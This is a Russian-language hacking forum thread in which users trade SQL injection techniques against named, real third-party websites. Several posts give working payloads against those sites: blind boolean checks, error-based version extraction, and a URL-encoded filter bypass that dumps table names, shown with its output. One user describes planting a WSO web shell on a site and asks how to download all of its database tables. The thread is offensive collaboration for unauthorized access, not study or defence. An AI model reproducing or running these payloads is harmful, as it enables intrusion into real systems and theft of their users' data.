16.04.2012, 02:49
|
|
Новичок
Регистрация: 04.08.2011
Сообщений: 27
С нами:
7775606
Репутация:
0
|
|
У меня вот это никак не крутится ни руками, ни софтом.
Там вообще есть что-нибудь?
Код:
http://develop.belta.by/{тут инъекция, видно через ОПЕРУ}
структура запроса
Код:
GET /1'"1000 HTTP/1.1
User-Agent: 1'"2000
referer: 1'"3000
client-ip: 1'"4000
x-forwarded-for: 1'"5000
accept-language: 1'"6000
via: 1'"7000 Cookie: PHPSESSID=4f4eba22b01c675b1c8b035f10e977ed
Host: develop.belta.by
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Это ошибка вываливается в order by?
Код:
Ошибка при работе с базой данных.
Пожалуйста, обратитесь к администратору.
You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to
use near ''''' at line 1
|
|
|
16.04.2012, 10:29
|
|
Участник форума
Регистрация: 30.07.2010
Сообщений: 118
С нами:
8308406
Репутация:
0
|
|
Сообщение от None
Это ошибка вываливается в order by?
думаю это было утверждение, нежели вопрос)
софтом не будет крутится, так как параметра уязвимого нет. Ну по крайней мере с sqlmap я не пробовал такое вытворять
с order by будет крутиться только если это не error based + 5 версия mysql. В остальных случаях прийдется использовать другие параметры или другой набор слов. Попробуй использовать как параметр phpsessid, то есть сайт/1'&PHPSESSID=значение'
и суй куда нибудь типа того же sqlmap. может поможет
|
|
|
|
16.04.2012, 11:20
|
|
Новичок
Регистрация: 06.04.2009
Сообщений: 2
С нами:
8998242
Репутация:
2
|
|
Юзабельно ?
Код:
http://www.softclub.ru/games/game.asp?id=11984'
|
|
|
|
16.04.2012, 15:41
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
asiaman
Скуля там в URI.
http://develop.belta.by/1'or(substring(version(),1,1)=5)and'1 - TRUE (Главная страница)
http://develop.belta.by/1'or(substring(version(),1,1)=4)and'1 - FALSE ()
Пробелы в такой скуле использовать нельзя, версия меньше, чем 5.1 (нету ф-ции ExtractValue).
Вывод версии в ошибке:
http://develop.belta.by/1'or(1,2)=(select*from(select(name_const(version() ,1)),name_const(version(),1))a)and'1
Duplicate column name '5.0.88-log'
t3cHn0iD
Нет.
|
|
|
|
16.04.2012, 16:00
|
|
Постоянный
Регистрация: 29.08.2010
Сообщений: 842
С нами:
8265206
Репутация:
84
|
|
Сообщение от None
http://www.l-craft.ru/catalog.php?c=38+order+by+1+--+
union+select +1+--+ не выводит ничего...
|
|
|
|
16.04.2012, 16:08
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от shadowrun
union+select +1+--+ не выводит ничего...
blind
Код:
http://www.l-craft.ru/catalog.php?c=38+and+substring(@@version,1,1)=5
|
|
|
|
16.04.2012, 18:07
|
|
Постоянный
Регистрация: 27.07.2011
Сообщений: 499
С нами:
7787126
Репутация:
53
|
|
Код:
http://intersport.ru/company/countries'
фильтр select и union. как обойти? |
|
|
|
16.04.2012, 19:57
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
С нами:
9384053
Репутация:
303
|
|
Сообщение от justonline
Код:
http://intersport.ru/company/countries'
фильтр select и union. как обойти? URL encode:
http://www.intersport.ru/products/cat/?cat_group_id=24&cat_producer_id=&id=149+or+1+%67% 72%6F%75%70+by+concat(%20(%73%65%6C%65%63%74%20tab le_name+%66%72%6F%6D+information_schema.tables+lim it+17,1),floor(rand(0)*2))%20having%20min(0)--+
-> 1062Duplicate entry 'banners1' for key 1
|
|
|
|
16.04.2012, 20:53
|
|
Новичок
Регистрация: 29.10.2008
Сообщений: 1
С нами:
9228480
Репутация:
0
|
|
Помогите, пожалуйста. После после пост запроса email=%5c&pass=451&x=31&y=9 выдается ошибка:
SQL Error(1064): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\' LIMIT 1' at line
1.[SELECT * FROM `member_account` WHERE email = '\' LIMIT 1]
как раскрутить?
|
|
|
|
16.04.2012, 21:01
|
|
Участник форума
Регистрация: 08.01.2010
Сообщений: 155
С нами:
8599678
Репутация:
22
|
|
залил шелл wso на сайт. как теперь можно попасть в phpmyadmin или узнать данные от него? мне нужно скачать все таблицы с сайта
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
